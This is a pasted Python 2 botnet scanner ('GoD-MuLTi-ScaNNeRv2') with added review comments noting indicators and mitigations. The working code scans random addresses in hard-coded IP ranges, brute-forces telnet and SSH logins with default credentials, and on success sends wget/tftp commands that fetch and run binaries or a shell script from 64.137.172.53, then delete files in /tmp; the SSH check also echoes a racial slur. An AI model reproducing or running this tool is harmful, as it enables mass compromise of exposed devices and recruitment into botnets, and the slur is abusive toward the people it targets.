
sadaad

a guest
Nov 21st, 2016
  1. #!/usr/bin/python
  2. """
  3. GoD-MuLTi-ScaNNeRv2(NeTiS/TeLNeT/SSH)
  4. By; LiGhT
  5. """
  6. import threading, sys, time, random, socket, re, os, paramiko
  7.  
  # Usage guard (Python 2 print statements): prints the banner and usage text
  # and exits unless four command-line arguments are supplied. Per the usage
  # string they are: thread count, addresses per scan round, SSH credential
  # list selector (1/2/3) and SSH range selector (A/B/C/D).
  8. if len(sys.argv) < 5:
  9. print "GoD-MuLTi-ScaNNeR v2\n By: LiGhT"
  10. print "Usage: python "+sys.argv[0]+" <threads(50-1000)> <ips per scan(100-10000)> <ssh pass list(1,2,3)> <ssh ranges(A,B,C,D)>\n"
  11. print "Example: python "+sys.argv[0]+" 500 5000 1 A\n"
  12. sys.exit()
  13.  
  # Hard-coded credential material used by the two login routines below.
  # usernames/passwords are consumed by the telnet thread, paired by index
  # (index 1 for the "mdm9625" banner, index 0 for the "9615-cdp" banner).
  # ssh_passwords holds "user:password" pairs tried by the SSH thread; the
  # list is chosen by argv[3].
  # NOTE(review): these look like unchanged vendor/default logins - confirm
  # against the device families named in the telnet banner checks. For
  # defenders, any internet-reachable device still accepting one of these
  # pairs on port 22 or 23 is exposed to this script.
  14. # USER AND PASS LISTS #
  15. usernames = ["root", "admin"] #DONT CHANGE
  16. passwords = ["oelinux123", "admin"] #DONT CHANGE
  17. if sys.argv[3] == "1":
  18. ssh_passwords = ["admin:1234"]
  19. elif sys.argv[3] == "2":
  20. ssh_passwords = ["admin:admin","root:root"]
  21. elif sys.argv[3] == "3":
  22. ssh_passwords = ["admin:1234","root:root","root:1234","admin:admin"]
  23.  
  # Fixed byte string containing "netcore" and a trailing NUL.
  # NOTE(review): not referenced anywhere else in the visible listing; the
  # header mentions "NeTiS", so this is presumably left over from a router
  # probe that this paste does not include - unconfirmed.
  24. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  25.  
  26.  
  # Second-stage locations. These are the network indicators on this page:
  #   host   64.137.172.53 (HTTP, with a TFTP fallback in commandpayload)
  #   paths  /82sr1 (labelled ARM4 binary), /82sr5 (labelled MIPSEL binary),
  #          /pewpew.sh (shell script fetched over SSH sessions)
  # url is used by the telnet thread and sh_file by the SSH thread.
  # commandpayload is not referenced elsewhere in the visible listing.
  # Detection idea: outbound wget/tftp from an embedded device to this host,
  # followed by chmod 777 and execution from /var or /tmp.
  27. # START CONFIGURATION #
  28. url = "http://64.137.172.53/82sr1" # ARM4 Binary
  29. sh_file = "http://64.137.172.53/pewpew.sh" # SH File
  30. commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf 82sr5; wget http://64.137.172.53/82sr5 || tftp -r 82sr5 -g 64.137.172.53; chmod 777 82sr5; ./82sr5; rm -rf 82sr5\x00" # MIPSEL Binary
  31.  
  # Runtime settings and target prefixes.
  # - spawn_shell is defined but not used in the visible listing.
  # - paramiko's log file is pointed at /dev/null, so the SSH library leaves
  #   no local log of connection attempts.
  # - threads (argv[1]) is the number of worker threads started at the end of
  #   the file; h0h0 (argv[2]) is the per-round address count used by worker().
  # - Tranges and Sranges are the first two octets of IPv4 addresses; worker()
  #   fills in the last two octets at random. Tranges feeds the telnet thread,
  #   Sranges feeds the SSH thread and is selected by argv[4] (any value other
  #   than A-D falls back to the same list as A).
  # Owners of addresses under these prefixes can expect the port 22/23 probes
  # described in the classes below.
  32. # DONT TOUCH
  33. spawn_shell = "cat | sh"
  34. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  35. threads = int(sys.argv[1])
  36. h0h0 = int(sys.argv[2])
  37. Tranges = ["119.150","119.151","119.152","119.153","119.154","119.155","119.156","119.157","119.158","119.159","182.189","182.190","182.191"]
  38. if sys.argv[4] == "A":
  39. Sranges = ["49.150","122.3","122.52","122.54","119.93","124.105","124.106","124.107","210.213"]
  40. elif sys.argv[4] == "B":
  41. Sranges = ["210.213","119.83","119.84","119.85","124.83","182.52","182.68","182.69","182.70"]
  42. elif sys.argv[4] == "C":
  43. Sranges = ["112.200","112.201","112.202","112.203","112.204","112.205","112.206","112.207","112.208","112.209","112.210","112.211","112.212","112.213","112.214"]
  44. elif sys.argv[4] == "D":
  45. Sranges = ["125.24","125.25","125.26","125.27","125.28","118.175","118.173","182.52"]
  46. else:
  47. Sranges = ["49.150","122.3","122.52","122.54","119.93","124.105","124.106","124.107","210.213"]
  # readUntil(tn, string, timeout=8): read from socket `tn` in 1024-byte
  # chunks, appending to a buffer, until `string` appears in the buffer (the
  # buffer is returned) or `timeout` seconds have elapsed (raises
  # Exception('TIMEOUT!')).
  # The elapsed-time check only runs between recv() calls; how long a single
  # recv() blocks is governed by the socket's own timeout, which the telnet
  # thread sets to 8 seconds.
  # NOTE(review): indentation was lost in this paste; the nesting described
  # here is inferred from statement order.
  48. def readUntil(tn, string, timeout=8):
  49. buf = ''
  50. start_time = time.time()
  51. while time.time() - start_time < timeout:
  52. buf += tn.recv(1024)
  53. time.sleep(0.01)
  54. if string in buf: return buf
  55. raise Exception('TIMEOUT!')
  56.  
  # worker(): endless scan loop run by each worker thread.
  # Per round it:
  #   1. picks one prefix from Sranges, builds h0h0 + 1 random addresses under
  #      it and starts one sssh thread per address, about 9 ms apart;
  #   2. picks one prefix from Tranges and does the same with ttelnet threads;
  #   3. sleeps 2 seconds.
  # Every exception is swallowed by bare except clauses; the only visible
  # signal is the red "WORKER ERROR" line.
  # Seen from the network, this is a burst of TCP/22 connection attempts to
  # random hosts inside one /16, followed by a burst of TCP/23 attempts inside
  # another /16 - a pattern that connection-rate or fan-out alerts on those
  # ports can catch.
  # NOTE(review): indentation was lost in this paste; loop and try nesting is
  # inferred from statement order.
  57. def worker():
  58. try:
  59. while True:
  60. try:
  61. h0h0h0 = h0h0 + 1
  62. br = random.choice(Sranges)
  63. for x in xrange(h0h0h0):
  64. try:
  65. ip = ''+br+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  66. ss = sssh(ip)
  67. ss.start()
  68. time.sleep(0.009)
  69. except:
  70. pass
  71. br2 = random.choice(Tranges)
  72. for y in xrange(h0h0h0):
  73. try:
  74. ip = ''+br2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  75. tt = ttelnet(ip)
  76. tt.start()
  77. time.sleep(0.009)
  78. except:
  79. pass
  80. time.sleep(2)
  81. except:
  82. print "\033[31mWORKER ERROR\033[37m"
  83. pass
  84. except:
  85. pass
  86.  
  # ttelnet: one thread per target address; attempts a telnet (TCP/23) login
  # with a banner-selected default credential and, if a shell prompt appears,
  # sends a download-and-execute command line.
  # Observable behaviour, useful for detection and triage:
  #   - raw TCP connection to port 23 with an 8 second timeout;
  #   - only banners containing "mdm9625" or "9615-cdp" lead to a login
  #     attempt; other banners leave username/password unset and the later
  #     steps fail inside swallowed exceptions;
  #   - after login the device is told to fetch `url` into /tmp/phone, mark it
  #     executable (chmod 777), run it and delete the file, so the binary may
  #     no longer be on disk by the time the device is examined;
  #   - when the login was not as root, `su` is issued first with passwords[0].
  # Mitigation on the device side: change the default logins listed at the top
  # of the file and do not expose telnet to untrusted networks.
  # NOTE(review): indentation was lost in this paste; method and try nesting
  # is inferred from statement order.
  87. class ttelnet(threading.Thread):
  88. def __init__ (self, ip):
  89. threading.Thread.__init__(self)
  90. self.ip = str(ip).rstrip('\n')
  91. def run(self):
  # Step 1: open the TCP/23 connection; a failure is ignored here and only
  # surfaces as exceptions in the later steps.
  92. try:
  93. tn = socket.socket()
  94. tn.settimeout(8)
  95. tn.connect((self.ip,23))
  96. except Exception:
  97. pass
  # Step 2: read up to the first ":" and choose credentials from the banner
  # text. r00t records whether the chosen account is root (1) or admin (0).
  98. try:
  99. hoho = ''
  100. hoho += readUntil(tn, ":")
  101. if "mdm9625" in hoho:
  102. r00t = 0
  103. username = usernames[1]
  104. password = passwords[1]
  105. tn.send(username + "\n")
  106. elif "9615-cdp" in hoho:
  107. r00t = 1
  108. username = usernames[0]
  109. password = passwords[0]
  110. tn.send(username + "\n")
  111. except Exception:
  112. pass
  # Step 3: wait for a prompt containing "assword" and send the password.
  113. try:
  114. hoho = ''
  115. hoho += readUntil(tn, ":")
  116. if "assword" in hoho:
  117. tn.send(password + "\n")
  118. time.sleep(3.5)
  119. except Exception:
  120. pass
  # Step 4: treat any of the characters # $ ~ > or the text "root@" in the
  # next 1024 bytes as a shell prompt, then send the fetch-and-run command.
  121. try:
  122. mp = ''
  123. mp += tn.recv(1024)
  124. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  125. if r00t: tn.send("cd /tmp; rm -rf phone; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  126. if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  127. except Exception:
  128. pass
  129.  
  # sssh: one thread per target address; tries each "user:password" pair from
  # ssh_passwords against SSH (TCP/22) and, on a working shell, fetches and
  # runs the script at sh_file.
  # Observable behaviour, useful for detection and triage:
  #   - paramiko client with AutoAddPolicy, so any host key is accepted;
  #   - each login attempt uses a 5 second timeout; "n/a" on either side of
  #     the colon is mapped to an empty username or password;
  #   - after a successful login a fixed marker string is echoed and the
  #     output checked before anything else is sent (presumably to skip hosts
  #     that accept the login but do not give a real shell - unconfirmed);
  #   - the follow-up command downloads sh_file to /tmp/l.sh, runs it with sh
  #     and then runs `rm -rf /tmp/*`, which also removes unrelated files in
  #     /tmp and the downloaded script itself.
  # In auth logs this appears as a short series of password failures for root
  # and admin from one source, optionally ending in a success followed at once
  # by exec requests. Mitigation: change the default logins and disable SSH
  # password authentication where key-based login is available.
  # NOTE(review): indentation was lost in this paste, so the placement of the
  # `if True == dobreak: break` pair and of the final `x = 0` relative to the
  # loops and the except clause cannot be determined from this page.
  130. class sssh(threading.Thread):
  131. def __init__ (self, ip):
  132. threading.Thread.__init__(self)
  133. self.ip = str(ip).rstrip('\n')
  134. def run(self):
  135. x = 1
  136. while x != 0:
  137. try:
  138. username='root'
  139. password="0"
  140. port = 22
  141. ssh = paramiko.SSHClient()
  142. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  143. dobreak=False
  # Credential loop: split each entry on ":" and attempt a login.
  144. for passwd in ssh_passwords:
  145. if ":n/a" in passwd:
  146. password=""
  147. else:
  148. password=passwd.split(":")[1]
  149. if "n/a:" in passwd:
  150. username=""
  151. else:
  152. username=passwd.split(":")[0]
  153. try:
  154. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  155. dobreak=True
  156. break
  157. except:
  158. pass
  159. if True == dobreak:
  160. break
  # Shell check: badserver stays True unless the echoed marker comes back.
  161. badserver=True
  162. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  163. output = stdout.read()
  164. if "nigger" in output:
  165. badserver=False
  166. if badserver == False:
  167. print "\033[36m[SSH] Command Sent %s!\033[37m"%(self.ip)
  168. ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  169. time.sleep(10)
  170. ssh.close()
  171. x = 0
  172. if badserver == True:
  173. ssh.close()
  174. except:
  175. pass
  176. x = 0
  177.  
  # Entry point: starts `threads` worker threads (count taken from argv[1]),
  # about 2 ms apart, each running worker(). Every worker in turn starts one
  # further thread per probed address, so the number of concurrent
  # connections is much larger than the thread count given on the command
  # line.
  178. for g in xrange(threads):
  179. try:
  180. print "started %s thread"%(g)
  181. t = threading.Thread(target=worker)
  182. t.start()
  183. time.sleep(0.002)
  184. except:
  185. pass